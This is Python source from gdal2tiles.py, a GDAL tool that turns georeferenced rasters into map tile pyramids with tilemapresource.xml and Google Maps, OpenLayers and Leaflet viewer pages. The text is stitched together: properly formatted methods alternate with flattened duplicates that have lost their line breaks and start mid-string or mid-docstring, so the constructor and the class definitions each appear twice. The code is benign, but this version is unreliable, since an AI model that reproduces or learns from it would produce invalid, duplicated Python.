        if not options.url.endswith('/'):
            options.url += '/'
        trimmed = output_folder
        if trimmed.endswith("/"):
            trimmed = trimmed[:-1]
        options.url += os.path.basename(trimmed) + '/'

    # Supported options
    if options.resampling == 'antialias' and not numpy_available:
        exit_with_error("'antialias' resampling algorithm is not available.",
                        "Install PIL (Python Imaging Library) and numpy.")

    # Non-ascii input names break the generated viewers when the locale is
    # not UTF-8 aware.
    try:
        os.path.basename(input_file).encode('ascii')
    except UnicodeEncodeError:
        full_ascii = False
    else:
        full_ascii = True

    # LC_CTYPE check
    if not full_ascii and 'UTF-8' not in os.environ.get("LC_CTYPE", ""):
        if not options.quiet:
            print("\nWARNING: "
                  "You are running gdal2tiles.py with a LC_CTYPE environment variable that is "
                  "not UTF-8 compatible, and your input file contains non-ascii characters. "
                  "The generated sample googlemaps, openlayers or "
                  "leaflet files might contain some invalid characters as a result\n")

    # Output the results
    if options.verbose:
        print("Options:", options)
        print("Input:", input_file)
        print("Output:", output_folder)
        print("Cache: %s MB" % (gdal.GetCacheMax() / 1024 / 1024))
        print('')

    return options
" "The generated sample googlemaps, openlayers or " "leaflet files might contain some invalid characters as a result\n") # Output the results if options.verbose: print("Options:", options) print("Input:", input_file) print("Output:", output_folder) print("Cache: %s MB" % (gdal.GetCacheMax() / 1024 / 1024)) print('') return options class TileDetail(object): tx = 0 ty = 0 tz = 0 rx = 0 ry = 0 rxsize = 0 rysize = 0 wx = 0 wy = 0 wxsize = 0 wysize = 0 querysize = 0 def __init__(self, **kwargs): for key in kwargs: if hasattr(self, key): setattr(self, key, kwargs[key]) def __unicode__(self): return "TileDetail %s\n%s\n%s\n" % (self.tx, self.ty, self.tz) def __str__(self): return "TileDetail %s\n%s\n%s\n" % (self.tx, self.ty, self.tz) def __repr__(self): return "TileDetail %s\n%s\n%s\n" % (self.tx, self.ty, self.tz) class TileJobInfo(object): """ Plain object to hold tile job configuration for a dataset """ src_file = "" nb_data_bands = 0 output_file_path = "" tile_extension = "" tile_size = 0 tile_driver = None kml = False tminmax = [] tminz = 0 tmaxz = 0 in_srs_wkt = 0 out_geo_trans = [] ominy = 0 is_epsg_4326 = False options = None exclude_transparent = False def __init__(self, **kwargs): for key in kwargs: if hasattr(self, key): setattr(self, key, kwargs[key]) def __unicode__(self): return "TileJobInfo %s\n" % (self.src_file) def __str__(self): return "TileJobInfo %s\n" % (self.src_file) def __repr__(self): return "TileJobInfo %s\n" % (self.src_file) class Gdal2TilesError(Exception): pass class GDAL2Tiles(object): def __init__(self, input_file, output_folder, options): """Constructor function - initialization""" self.out_drv = None self.mem_drv = None self.warped_input_dataset = None self.out_srs = None self.nativezoom = None self.tminmax = None self.tsize = None self.mercator = None self.geodetic = None self.alphaband = None self.dataBandsCount = None self.out_gt = None self.tileswne = None self.swne = None self.ominx = None self.omaxx = None self.omaxy = None 
    def __init__(self, input_file, output_folder, options):
        """Constructor function - initialization

        Declares every attribute the other methods rely on (most are filled
        in later by open_input()), fixes the tile format, creates the temp
        VRT path and derives query size / zoom range from *options*.
        """
        # Attributes populated later by open_input(); declared here so the
        # full instance state is visible in one place.
        self.out_drv = None
        self.mem_drv = None
        self.warped_input_dataset = None
        self.out_srs = None
        self.nativezoom = None
        self.tminmax = None
        self.tsize = None
        self.mercator = None
        self.geodetic = None
        self.alphaband = None
        self.dataBandsCount = None
        self.out_gt = None
        self.tileswne = None
        self.swne = None
        self.ominx = None
        self.omaxx = None
        self.omaxy = None
        self.ominy = None
        self.input_file = None
        self.output_folder = None
        self.isepsg4326 = None
        self.in_srs_wkt = None

        # Tile format
        self.tile_size = 256
        self.tiledriver = 'PNG'
        self.tileext = 'png'
        # Per-run scratch VRT with a unique name, used as the tiling source.
        self.tmp_dir = tempfile.mkdtemp()
        self.tmp_vrt_filename = os.path.join(self.tmp_dir, str(uuid4()) + '.vrt')

        # Should we read bigger window of the input raster and scale it down?
        # Note: Modified later by open_input()
        # Not for 'near' resampling
        # Not for Wavelet based drivers (JPEG2000, ECW, MrSID)
        # Not for 'raster' profile
        self.scaledquery = True
        # How big should be query window be for scaling down
        # Later on reset according the chosen resampling algorightm
        self.querysize = 4 * self.tile_size
        # Should we use Read on the input file for generating overview tiles?
        # Note: Modified later by open_input()
        # Otherwise the overview tiles are generated from existing underlying tiles
        self.overviewquery = False

        self.input_file = input_file
        self.output_folder = output_folder
        self.options = options

        # Cheaper resampling methods need a smaller oversampled query window.
        if self.options.resampling == 'near':
            self.querysize = self.tile_size
        elif self.options.resampling == 'bilinear':
            self.querysize = self.tile_size * 2

        # User specified zoom levels
        self.tminz = None
        self.tmaxz = None
        if self.options.zoom:
            # Accepts either 'N' or 'N-M'; a lone 'N' means min == max.
            minmax = self.options.zoom.split('-', 1)
            minmax.extend([''])
            zoom_min, zoom_max = minmax[:2]
            self.tminz = int(zoom_min)
            if zoom_max:
                self.tmaxz = int(zoom_max)
            else:
                self.tmaxz = int(zoom_min)

        # KML generation
        self.kml = self.options.kml
    def open_input(self):
        """Initialization of the input raster, reprojection if necessary

        Opens and validates the input file, determines input/output SRS,
        warps the dataset into the output SRS when required, snapshots it
        into the temporary VRT, and precomputes output bounds plus the
        per-zoom tile min/max tables for the selected profile.
        """
        gdal.AllRegister()

        self.out_drv = gdal.GetDriverByName(self.tiledriver)
        self.mem_drv = gdal.GetDriverByName('MEM')

        if not self.out_drv:
            raise Exception("The '%s' driver was not found, is it available in this GDAL build?"
                            % self.tiledriver)
        if not self.mem_drv:
            raise Exception("The 'MEM' driver was not found, is it available in this GDAL build?")

        # Open the input file
        if self.input_file:
            input_dataset = gdal.Open(self.input_file, gdal.GA_ReadOnly)
        else:
            raise Exception("No input file was specified")

        if self.options.verbose:
            print("Input file:",
                  "( %sP x %sL - %s bands)" % (input_dataset.RasterXSize,
                                               input_dataset.RasterYSize,
                                               input_dataset.RasterCount))

        if not input_dataset:
            # Note: GDAL prints the ERROR message too
            exit_with_error("It is not possible to open the input file '%s'." % self.input_file)

        # Read metadata from the input file
        if input_dataset.RasterCount == 0:
            exit_with_error("Input file '%s' has no raster band" % self.input_file)

        if input_dataset.GetRasterBand(1).GetRasterColorTable():
            exit_with_error(
                "Please convert this file to RGB/RGBA and run gdal2tiles on the result.",
                "From paletted file you can create RGBA file (temp.vrt) by:\n"
                "gdal_translate -of vrt -expand rgba %s temp.vrt\n"
                "then run:\n"
                "gdal2tiles temp.vrt" % self.input_file
            )

        in_nodata = setup_no_data_values(input_dataset, self.options)

        if self.options.verbose:
            print("Preprocessed file:",
                  "( %sP x %sL - %s bands)" % (input_dataset.RasterXSize,
                                               input_dataset.RasterYSize,
                                               input_dataset.RasterCount))

        in_srs, self.in_srs_wkt = setup_input_srs(input_dataset, self.options)

        self.out_srs = setup_output_srs(in_srs, self.options)

        # If input and output reference systems are different, we reproject the input dataset into
        # the output reference system for easier manipulation

        self.warped_input_dataset = None

        if self.options.profile in ('mercator', 'geodetic'):

            if not in_srs:
                exit_with_error(
                    "Input file has unknown SRS.",
                    "Use --s_srs ESPG:xyz (or similar) to provide source reference system.")

            if not has_georeference(input_dataset):
                exit_with_error(
                    "There is no georeference - neither affine transformation (worldfile) "
                    "nor GCPs. You can generate only 'raster' profile tiles.",
                    "Either gdal2tiles with parameter -p 'raster' or use another GIS "
                    "software for georeference e.g. gdal_transform -gcp / -a_ullr / -a_srs"
                )

            if ((in_srs.ExportToProj4() != self.out_srs.ExportToProj4()) or
                    (input_dataset.GetGCPCount() != 0)):
                self.warped_input_dataset = reproject_dataset(
                    input_dataset, in_srs, self.out_srs)

                # Either force the NODATA values onto the warped VRT or,
                # lacking them, synthesize an alpha band for 1/3-band inputs.
                if in_nodata:
                    self.warped_input_dataset = update_no_data_values(
                        self.warped_input_dataset, in_nodata, options=self.options)
                else:
                    self.warped_input_dataset = update_alpha_value_for_non_alpha_inputs(
                        self.warped_input_dataset, options=self.options)

            if self.warped_input_dataset and self.options.verbose:
                print("Projected file:", "tiles.vrt", "( %sP x %sL - %s bands)" % (
                    self.warped_input_dataset.RasterXSize,
                    self.warped_input_dataset.RasterYSize,
                    self.warped_input_dataset.RasterCount))

        if not self.warped_input_dataset:
            self.warped_input_dataset = input_dataset

        # Snapshot the (possibly warped) dataset to the temp VRT that the
        # tiling workers will open.
        gdal.GetDriverByName('VRT').CreateCopy(self.tmp_vrt_filename,
                                               self.warped_input_dataset)

        # Get alpha band (either directly or from NODATA value)
        self.alphaband = self.warped_input_dataset.GetRasterBand(1).GetMaskBand()
        self.dataBandsCount = nb_data_bands(self.warped_input_dataset)

        # KML test
        self.isepsg4326 = False
        srs4326 = osr.SpatialReference()
        srs4326.ImportFromEPSG(4326)
        if self.out_srs and srs4326.ExportToProj4() == self.out_srs.ExportToProj4():
            self.kml = True
            self.isepsg4326 = True
            if self.options.verbose:
                print("KML autotest OK!")

        # Read the georeference
        self.out_gt = self.warped_input_dataset.GetGeoTransform()

        # Test the size of the pixel

        # Report error in case rotation/skew is in geotransform (possible only in 'raster' profile)
        if (self.out_gt[2], self.out_gt[4]) != (0, 0):
            exit_with_error("Georeference of the raster contains rotation or skew. "
                            "Such raster is not supported. Please use gdalwarp first.")

        # Here we expect: pixel is square, no rotation on the raster

        # Output Bounds - coordinates in the output SRS
        # NOTE(review): ominy uses out_gt[1] (pixel width) instead of the
        # y-resolution, relying on the square-pixel expectation above.
        self.ominx = self.out_gt[0]
        self.omaxx = self.out_gt[0] + self.warped_input_dataset.RasterXSize * self.out_gt[1]
        self.omaxy = self.out_gt[3]
        self.ominy = self.out_gt[3] - self.warped_input_dataset.RasterYSize * self.out_gt[1]
        # Note: maybe round(x, 14) to avoid the gdal_translate behaviour, when 0 becomes -1e-15

        if self.options.verbose:
            print("Bounds (output srs):", round(self.ominx, 13), self.ominy, self.omaxx, self.omaxy)

        # Calculating ranges for tiles in different zoom levels
        if self.options.profile == 'mercator':

            self.mercator = GlobalMercator()

            # Function which generates SWNE in LatLong for given tile
            self.tileswne = self.mercator.TileLatLonBounds

            # Generate table with min max tile coordinates for all zoomlevels
            self.tminmax = list(range(0, 32))
            for tz in range(0, 32):
                tminx, tminy = self.mercator.MetersToTile(self.ominx, self.ominy, tz)
                tmaxx, tmaxy = self.mercator.MetersToTile(self.omaxx, self.omaxy, tz)
                # crop tiles extending world limits (+-180,+-90)
                tminx, tminy = max(0, tminx), max(0, tminy)
                tmaxx, tmaxy = min(2**tz - 1, tmaxx), min(2**tz - 1, tmaxy)
                self.tminmax[tz] = (tminx, tminy, tmaxx, tmaxy)

            # TODO: Maps crossing 180E (Alaska?)

            # Get the minimal zoom level (map covers area equivalent to one tile)
            if self.tminz is None:
                self.tminz = self.mercator.ZoomForPixelSize(
                    self.out_gt[1] *
                    max(self.warped_input_dataset.RasterXSize,
                        self.warped_input_dataset.RasterYSize) /
                    float(self.tile_size))

            # Get the maximal zoom level
            # (closest possible zoom level up on the resolution of raster)
            if self.tmaxz is None:
                self.tmaxz = self.mercator.ZoomForPixelSize(self.out_gt[1])

            if self.options.verbose:
                print("Bounds (latlong):",
                      self.mercator.MetersToLatLon(self.ominx, self.ominy),
                      self.mercator.MetersToLatLon(self.omaxx, self.omaxy))
                print('MinZoomLevel:', self.tminz)
                print("MaxZoomLevel:",
                      self.tmaxz,
                      "(",
                      self.mercator.Resolution(self.tmaxz),
                      ")")

        if self.options.profile == 'geodetic':

            self.geodetic = GlobalGeodetic(self.options.tmscompatible)

            # Function which generates SWNE in LatLong for given tile
            self.tileswne = self.geodetic.TileLatLonBounds

            # Generate table with min max tile coordinates for all zoomlevels
            self.tminmax = list(range(0, 32))
            for tz in range(0, 32):
                tminx, tminy = self.geodetic.LonLatToTile(self.ominx, self.ominy, tz)
                tmaxx, tmaxy = self.geodetic.LonLatToTile(self.omaxx, self.omaxy, tz)
                # crop tiles extending world limits (+-180,+-90)
                tminx, tminy = max(0, tminx), max(0, tminy)
                tmaxx, tmaxy = min(2**(tz + 1) - 1, tmaxx), min(2**tz - 1, tmaxy)
                self.tminmax[tz] = (tminx, tminy, tmaxx, tmaxy)

            # TODO: Maps crossing 180E (Alaska?)

            # Get the minimal zoom level (map covers area equivalent to one tile)
            if self.tminz is None:
                self.tminz = self.geodetic.ZoomForPixelSize(
                    self.out_gt[1] *
                    max(self.warped_input_dataset.RasterXSize,
                        self.warped_input_dataset.RasterYSize) /
                    float(self.tile_size))

            # Get the maximal zoom level
            # (closest possible zoom level up on the resolution of raster)
            if self.tmaxz is None:
                self.tmaxz = self.geodetic.ZoomForPixelSize(self.out_gt[1])

            if self.options.verbose:
                print("Bounds (latlong):", self.ominx, self.ominy, self.omaxx, self.omaxy)

        if self.options.profile == 'raster':

            def log2(x):
                return math.log10(x) / math.log10(2)

            # Smallest zoom at which one tile covers the whole raster axis.
            self.nativezoom = int(
                max(math.ceil(log2(self.warped_input_dataset.RasterXSize / float(self.tile_size))),
                    math.ceil(log2(self.warped_input_dataset.RasterYSize / float(self.tile_size)))))

            if self.options.verbose:
                print("Native zoom of the raster:", self.nativezoom)

            # Get the minimal zoom level (whole raster in one tile)
            if self.tminz is None:
                self.tminz = 0

            # Get the maximal zoom level (native resolution of the raster)
            if self.tmaxz is None:
                self.tmaxz = self.nativezoom

            # Generate table with min max tile coordinates for all zoomlevels
            self.tminmax = list(range(0, self.tmaxz + 1))
            self.tsize = list(range(0, self.tmaxz + 1))
            for tz in range(0, self.tmaxz + 1):
                tsize = 2.0**(self.nativezoom - tz) * self.tile_size
                tminx, tminy = 0, 0
                tmaxx = int(math.ceil(self.warped_input_dataset.RasterXSize / tsize)) - 1
                tmaxy = int(math.ceil(self.warped_input_dataset.RasterYSize / tsize)) - 1
                self.tsize[tz] = math.ceil(tsize)
                self.tminmax[tz] = (tminx, tminy, tmaxx, tmaxy)

            # Function which generates SWNE in LatLong for given tile
            if self.kml and self.in_srs_wkt:
                ct = osr.CoordinateTransformation(in_srs, srs4326)

                def rastertileswne(x, y, z):
                    pixelsizex = (2**(self.tmaxz - z) * self.out_gt[1])     # X-pixel size in level
                    west = self.out_gt[0] + x * self.tile_size * pixelsizex
                    east = west + self.tile_size * pixelsizex
                    south = self.ominy + y * self.tile_size * pixelsizex
                    north = south + self.tile_size * pixelsizex
                    if not self.isepsg4326:
                        # Transformation to EPSG:4326 (WGS84 datum)
                        west, south = ct.TransformPoint(west, south)[:2]
                        east, north = ct.TransformPoint(east, north)[:2]
                    return south, west, north, east

                self.tileswne = rastertileswne
            else:
                self.tileswne = lambda x, y, z: (0, 0, 0, 0)  # noqa
    def generate_metadata(self):
        """
        Generation of main metadata files and HTML viewers (metadata related to particular
        tiles are generated during the tile processing).

        Writes (profile-dependent, honoring --resume and --webviewer):
        googlemaps.html / openlayers.html / leaflet.html, tilemapresource.xml
        and, when KML output is on, the root doc.kml.
        """

        if not os.path.exists(self.output_folder):
            os.makedirs(self.output_folder)

        if self.options.profile == 'mercator':

            # Bounds in lat/lon, clamped to the web-mercator world extent.
            south, west = self.mercator.MetersToLatLon(self.ominx, self.ominy)
            north, east = self.mercator.MetersToLatLon(self.omaxx, self.omaxy)
            south, west = max(-85.05112878, south), max(-180.0, west)
            north, east = min(85.05112878, north), min(180.0, east)
            self.swne = (south, west, north, east)

            # Generate googlemaps.html
            if self.options.webviewer in ('all', 'google') and self.options.profile == 'mercator':
                if (not self.options.resume or not
                        os.path.exists(os.path.join(self.output_folder, 'googlemaps.html'))):
                    with open(os.path.join(self.output_folder, 'googlemaps.html'), 'wb') as f:
                        f.write(self.generate_googlemaps().encode('utf-8'))

            # Generate openlayers.html
            if self.options.webviewer in ('all', 'openlayers'):
                if (not self.options.resume or not
                        os.path.exists(os.path.join(self.output_folder, 'openlayers.html'))):
                    with open(os.path.join(self.output_folder, 'openlayers.html'), 'wb') as f:
                        f.write(self.generate_openlayers().encode('utf-8'))

            # Generate leaflet.html
            if self.options.webviewer in ('all', 'leaflet'):
                if (not self.options.resume or not
                        os.path.exists(os.path.join(self.output_folder, 'leaflet.html'))):
                    with open(os.path.join(self.output_folder, 'leaflet.html'), 'wb') as f:
                        f.write(self.generate_leaflet().encode('utf-8'))

        elif self.options.profile == 'geodetic':

            # Bounds in lat/lon, clamped to the full geodetic world extent.
            west, south = self.ominx, self.ominy
            east, north = self.omaxx, self.omaxy
            south, west = max(-90.0, south), max(-180.0, west)
            north, east = min(90.0, north), min(180.0, east)
            self.swne = (south, west, north, east)

            # Generate openlayers.html
            if self.options.webviewer in ('all', 'openlayers'):
                if (not self.options.resume or not
                        os.path.exists(os.path.join(self.output_folder, 'openlayers.html'))):
                    with open(os.path.join(self.output_folder, 'openlayers.html'), 'wb') as f:
                        f.write(self.generate_openlayers().encode('utf-8'))

        elif self.options.profile == 'raster':

            west, south = self.ominx, self.ominy
            east, north = self.omaxx, self.omaxy

            self.swne = (south, west, north, east)

            # Generate openlayers.html
            if self.options.webviewer in ('all', 'openlayers'):
                if (not self.options.resume or not
                        os.path.exists(os.path.join(self.output_folder, 'openlayers.html'))):
                    with open(os.path.join(self.output_folder, 'openlayers.html'), 'wb') as f:
                        f.write(self.generate_openlayers().encode('utf-8'))

        # Generate tilemapresource.xml.
        if not self.options.resume or not os.path.exists(
                os.path.join(self.output_folder, 'tilemapresource.xml')):
            with open(os.path.join(self.output_folder, 'tilemapresource.xml'), 'wb') as f:
                f.write(self.generate_tilemapresource().encode('utf-8'))

        if self.kml:
            # TODO: Maybe problem for not automatically generated tminz
            # The root KML should contain links to all tiles in the tminz level
            children = []
            xmin, ymin, xmax, ymax = self.tminmax[self.tminz]
            for x in range(xmin, xmax + 1):
                for y in range(ymin, ymax + 1):
                    children.append([x, y, self.tminz])
            # Generate Root KML
            if self.kml:
                if (not self.options.resume or not
                        os.path.exists(os.path.join(self.output_folder, 'doc.kml'))):
                    with open(os.path.join(self.output_folder, 'doc.kml'), 'wb') as f:
                        f.write(generate_kml(
                            None, None, None, self.tileext, self.tile_size, self.tileswne,
                            self.options, children
                        ).encode('utf-8'))
    def generate_base_tiles(self):
        """
        Generation of the base tiles (the lowest in the pyramid) directly from the input raster

        Does not render anything itself: for every max-zoom tile it computes
        the raster read window and the tile write window, collects them as
        TileDetail objects and returns ``(TileJobInfo, [TileDetail, ...])``
        for the workers (see create_base_tile) to consume.
        """

        if not self.options.quiet:
            print("Generating Base Tiles:")

        if self.options.verbose:
            print('')
            print("Tiles generated from the max zoom level:")
            print("----------------------------------------")
            print('')

        # Set the bounds
        tminx, tminy, tmaxx, tmaxy = self.tminmax[self.tmaxz]

        ds = self.warped_input_dataset
        # One extra band for alpha on top of the data bands.
        tilebands = self.dataBandsCount + 1
        querysize = self.querysize

        if self.options.verbose:
            print("dataBandsCount: ", self.dataBandsCount)
            print("tilebands: ", tilebands)

        tcount = (1 + abs(tmaxx - tminx)) * (1 + abs(tmaxy - tminy))
        ti = 0

        tile_details = []

        tz = self.tmaxz
        for ty in range(tmaxy, tminy - 1, -1):
            for tx in range(tminx, tmaxx + 1):

                ti += 1
                tilefilename = os.path.join(
                    self.output_folder, str(tz), str(tx), "%s.%s" % (ty, self.tileext))
                if self.options.verbose:
                    print(ti, '/', tcount, tilefilename)

                if self.options.resume and os.path.exists(tilefilename):
                    if self.options.verbose:
                        print("Tile generation skipped because of --resume")
                    continue

                # Create directories for the tile
                if not os.path.exists(os.path.dirname(tilefilename)):
                    os.makedirs(os.path.dirname(tilefilename))

                if self.options.profile == 'mercator':
                    # Tile bounds in EPSG:3857
                    b = self.mercator.TileBounds(tx, ty, tz)
                elif self.options.profile == 'geodetic':
                    b = self.geodetic.TileBounds(tx, ty, tz)

                # Don't scale up by nearest neighbour, better change the querysize
                # to the native resolution (and return smaller query tile) for scaling

                if self.options.profile in ('mercator', 'geodetic'):
                    rb, wb = self.geo_query(ds, b[0], b[3], b[2], b[1])

                    # Pixel size in the raster covering query geo extent
                    nativesize = wb[0] + wb[2]
                    if self.options.verbose:
                        print("\tNative Extent (querysize", nativesize, "): ", rb, wb)

                    # Tile bounds in raster coordinates for ReadRaster query
                    rb, wb = self.geo_query(ds, b[0], b[3], b[2], b[1], querysize=querysize)

                    rx, ry, rxsize, rysize = rb
                    wx, wy, wxsize, wysize = wb

                else:     # 'raster' profile:

                    tsize = int(self.tsize[tz])   # tile_size in raster coordinates for actual zoom
                    xsize = self.warped_input_dataset.RasterXSize     # size of the raster in pixels
                    ysize = self.warped_input_dataset.RasterYSize
                    if tz >= self.nativezoom:
                        querysize = self.tile_size

                    # Read window; edge tiles may cover only a remainder strip.
                    rx = (tx) * tsize
                    rxsize = 0
                    if tx == tmaxx:
                        rxsize = xsize % tsize
                    if rxsize == 0:
                        rxsize = tsize

                    rysize = 0
                    if ty == tmaxy:
                        rysize = ysize % tsize
                    if rysize == 0:
                        rysize = tsize
                    ry = ysize - (ty * tsize) - rysize

                    # Write window inside the tile; partial tiles are anchored
                    # to the bottom of the tile canvas.
                    wx, wy = 0, 0
                    wxsize = int(rxsize / float(tsize) * self.tile_size)
                    wysize = int(rysize / float(tsize) * self.tile_size)
                    if wysize != self.tile_size:
                        wy = self.tile_size - wysize

                # Read the source raster if anything is going inside the tile as per the computed
                # geo_query
                tile_details.append(
                    TileDetail(
                        tx=tx, ty=ty, tz=tz, rx=rx, ry=ry, rxsize=rxsize, rysize=rysize, wx=wx,
                        wy=wy, wxsize=wxsize, wysize=wysize, querysize=querysize,
                    )
                )

        conf = TileJobInfo(
            src_file=self.tmp_vrt_filename,
            nb_data_bands=self.dataBandsCount,
            output_file_path=self.output_folder,
            tile_extension=self.tileext,
            tile_driver=self.tiledriver,
            tile_size=self.tile_size,
            kml=self.kml,
            tminmax=self.tminmax,
            tminz=self.tminz,
            tmaxz=self.tmaxz,
            in_srs_wkt=self.in_srs_wkt,
            out_geo_trans=self.out_gt,
            ominy=self.ominy,
            is_epsg_4326=self.isepsg4326,
            options=self.options,
            exclude_transparent=self.options.exclude_transparent,
        )

        return conf, tile_details
raises Gdal2TilesError if the dataset does not contain anything inside this geo_query """ geotran = ds.GetGeoTransform() rx = int((ulx - geotran[0]) / geotran[1] + 0.001) ry = int((uly - geotran[3]) / geotran[5] + 0.001) rxsize = int((lrx - ulx) / geotran[1] + 0.5) rysize = int((lry - uly) / geotran[5] + 0.5) if not querysize: wxsize, wysize = rxsize, rysize else: wxsize, wysize = querysize, querysize # Coordinates should not go out of the bounds of the raster wx = 0 if rx < 0: rxshift = abs(rx) wx = int(wxsize * (float(rxshift) / rxsize)) wxsize = wxsize - wx rxsize = rxsize - int(rxsize * (float(rxshift) / rxsize)) rx = 0 if rx + rxsize > ds.RasterXSize: wxsize = int(wxsize * (float(ds.RasterXSize - rx) / rxsize)) rxsize = ds.RasterXSize - rx wy = 0 if ry < 0: ryshift = abs(ry) wy = int(wysize * (float(ryshift) / rysize)) wysize = wysize - wy rysize = rysize - int(rysize * (float(ryshift) / rysize)) ry = 0 if ry + rysize > ds.RasterYSize: wysize = int(wysize * (float(ds.RasterYSize - ry) / rysize)) rysize = ds.RasterYSize - ry return (rx, ry, rxsize, rysize), (wx, wy, wxsize, wysize) def generate_tilemapresource(self): """ Template for tilemapresource.xml. Returns filled string. 
Expected variables: title, north, south, east, west, isepsg4326, projection, publishurl, zoompixels, tile_size, tileformat, profile """ args = {} args['title'] = self.options.title args['south'], args['west'], args['north'], args['east'] = self.swne args['tile_size'] = self.tile_size args['tileformat'] = self.tileext args['publishurl'] = self.options.url args['profile'] = self.options.profile if self.options.profile == 'mercator': args['srs'] = "EPSG:3857" elif self.options.profile == 'geodetic': args['srs'] = "EPSG:4326" elif self.options.s_srs: args['srs'] = self.options.s_srs elif self.out_srs: args['srs'] = self.out_srs.ExportToWkt() else: args['srs'] = "" s = """<?xml version="1.0" encoding="utf-8"?> <TileMap version="1.0.0" tilemapservice="http://tms.osgeo.org/1.0.0"> <Title>%(title)s</Title> <Abstract></Abstract> <SRS>%(srs)s</SRS> <BoundingBox minx="%(west).14f" miny="%(south).14f" maxx="%(east).14f" maxy="%(north).14f"/> <Origin x="%(west).14f" y="%(south).14f"/> <TileFormat width="%(tile_size)d" height="%(tile_size)d" mime-type="image/%(tileformat)s" extension="%(tileformat)s"/> <TileSets profile="%(profile)s"> """ % args # noqa for z in range(self.tminz, self.tmaxz + 1): if self.options.profile == 'raster': s += """ <TileSet href="%s%d" units-per-pixel="%.14f" order="%d"/>\n""" % ( args['publishurl'], z, (2**(self.nativezoom - z) * self.out_gt[1]), z) elif self.options.profile == 'mercator': s += """ <TileSet href="%s%d" units-per-pixel="%.14f" order="%d"/>\n""" % ( args['publishurl'], z, 156543.0339 / 2**z, z) elif self.options.profile == 'geodetic': s += """ <TileSet href="%s%d" units-per-pixel="%.14f" order="%d"/>\n""" % ( args['publishurl'], z, 0.703125 / 2**z, z) s += """ </TileSets> </TileMap> """ return s def generate_googlemaps(self): """ Template for googlemaps.html implementing Overlay of tiles for 'mercator' profile. It returns filled string. 
Expected variables: title, googlemapskey, north, south, east, west, minzoom, maxzoom, tile_size, tileformat, publishurl """ args = {} args['title'] = self.options.title args['googlemapskey'] = self.options.googlekey args['south'], args['west'], args['north'], args['east'] = self.swne args['minzoom'] = self.tminz args['maxzoom'] = self.tmaxz args['tile_size'] = self.tile_size args['tileformat'] = self.tileext args['publishurl'] = self.options.url args['copyright'] = self.options.copyright s = r"""<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:v="urn:schemas-microsoft-com:vml"> <head> <title>%(title)s</title> <meta http-equiv="content-type" content="text/html; charset=utf-8"/> <meta http-equiv='imagetoolbar' content='no'/> <style type="text/css"> v\:* {behavior:url(#default#VML);} html, body { overflow: hidden; padding: 0; height: 100%%; width: 100%%; font-family: 'Lucida Grande',Geneva,Arial,Verdana,sans-serif; } body { margin: 10px; background: #fff; } h1 { margin: 0; padding: 6px; border:0; font-size: 20pt; } #header { height: 43px; padding: 0; background-color: #eee; border: 1px solid #888; } #subheader { height: 12px; text-align: right; font-size: 10px; color: #555;} #map { height: 95%%; border: 1px solid #888; } </style> <script src='http://maps.google.com/maps?file=api&amp;v=2&amp;key=%(googlemapskey)s'></script> <script> //<![CDATA[ /* * Constants for given map * TODO: read it from tilemapresource.xml */ var mapBounds = new GLatLngBounds(new GLatLng(%(south)s, %(west)s), new GLatLng(%(north)s, %(east)s)); var mapMinZoom = %(minzoom)s; var mapMaxZoom = %(maxzoom)s; var opacity = 0.75; var map; var hybridOverlay; /* * Create a Custom Opacity GControl * http://www.maptiler.org/google-maps-overlay-opacity-control/ */ var CTransparencyLENGTH = 58; // maximum width that the knob can move (slide width minus knob width) function CTransparencyControl( 
overlay ) { this.overlay = overlay; this.opacity = overlay.getTileLayer().getOpacity(); } CTransparencyControl.prototype = new GControl(); // This function positions the slider to match the specified opacity CTransparencyControl.prototype.setSlider = function(pos) { var left = Math.round((CTransparencyLENGTH*pos)); this.slide.left = left; this.knob.style.left = left+"px"; this.knob.style.top = "0px"; } // This function reads the slider and sets the overlay opacity level CTransparencyControl.prototype.setOpacity = function() { // set the global variable opacity = this.slide.left/CTransparencyLENGTH; this.map.clearOverlays(); this.map.addOverlay(this.overlay, { zPriority: 0 }); if (this.map.getCurrentMapType() == G_HYBRID_MAP) { this.map.addOverlay(hybridOverlay); } } // This gets called by the API when addControl(new CTransparencyControl()) CTransparencyControl.prototype.initialize = function(map) { var that=this; this.map = map; // Is this MSIE, if so we need to use AlphaImageLoader var agent = navigator.userAgent.toLowerCase(); if ((agent.indexOf("msie") > -1) && (agent.indexOf("opera") < 1)){this.ie = true} else {this.ie = false} // create the background graphic as a <div> containing an image var container = document.createElement("div"); container.style.width="70px"; container.style.height="21px"; // Handle transparent PNG files in MSIE if (this.ie) { var loader = "filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='http://www.maptiler.org/img/opacity-slider.png', sizingMethod='crop');"; container.innerHTML = '<div style="height:21px; width:70px; ' +loader+ '" ></div>'; } else { container.innerHTML = '<div style="height:21px; width:70px; background-image: url(http://www.maptiler.org/img/opacity-slider.png)" ></div>'; } // create the knob as a GDraggableObject // Handle transparent PNG files in MSIE if (this.ie) { var loader = "progid:DXImageTransform.Microsoft.AlphaImageLoader(src='http://www.maptiler.org/img/opacity-slider.png', 
sizingMethod='crop');"; this.knob = document.createElement("div"); this.knob.style.height="21px"; this.knob.style.width="13px"; this.knob.style.overflow="hidden"; this.knob_img = document.createElement("div"); this.knob_img.style.height="21px"; this.knob_img.style.width="83px"; this.knob_img.style.filter=loader; this.knob_img.style.position="relative"; this.knob_img.style.left="-70px"; this.knob.appendChild(this.knob_img); } else { this.knob = document.createElement("div"); this.knob.style.height="21px"; this.knob.style.width="13px"; this.knob.style.backgroundImage="url(http://www.maptiler.org/img/opacity-slider.png)"; this.knob.style.backgroundPosition="-70px 0px"; } container.appendChild(this.knob); this.slide=new GDraggableObject(this.knob, {container:container}); this.slide.setDraggableCursor('pointer'); this.slide.setDraggingCursor('pointer'); this.container = container; // attach the control to the map map.getContainer().appendChild(container); // init slider this.setSlider(this.opacity); // Listen for the slider being moved and set the opacity GEvent.addListener(this.slide, "dragend", function() {that.setOpacity()}); //GEvent.addListener(this.container, "click", function( x, y ) { alert(x, y) }); return container; } // Set the default position for the control CTransparencyControl.prototype.getDefaultPosition = function() { return new GControlPosition(G_ANCHOR_TOP_RIGHT, new GSize(7, 47)); } /* * Full-screen Window Resize */ function getWindowHeight() { if (self.innerHeight) return self.innerHeight; if (document.documentElement && document.documentElement.clientHeight) return document.documentElement.clientHeight; if (document.body) return document.body.clientHeight; return 0; } function getWindowWidth() { if (self.innerWidth) return self.innerWidth; if 